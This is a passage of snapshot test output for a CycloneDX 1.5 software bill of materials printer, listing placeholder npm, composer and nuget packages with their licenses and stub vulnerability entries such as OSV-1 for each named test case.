"3.2.5", "licenses": [ { "license": { "id": "UNKNOWN" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": 
"Apache-2.0" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" }, { "bom-ref": "pkg:nuget/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:nuget/mine1@1.3.5" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": 
"pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/multiple_sources_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/no_sources - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] { "$schema": 
"http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "UNKNOWN" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } }, { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", 
"bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": 
"pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { 
"vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2", "type": "library", "name": "mine2", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { 
"id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/one_source_with_one_deprecated_package - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/deprecated-pkg@1.0.0", "type": "library", "name": "deprecated-pkg", "version": "1.0.0", "licenses": [], "purl": "pkg:npm/deprecated-pkg@1.0.0", "properties": [ { "name": "deprecated", "value": "true" } ] } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } 
--- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": 
"1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], 
"ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": 
"pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], 
"description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { 
"id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [], "purl": "pkg:npm/mine1" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "$schema": 
"http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/no_sources - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- 
[TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], 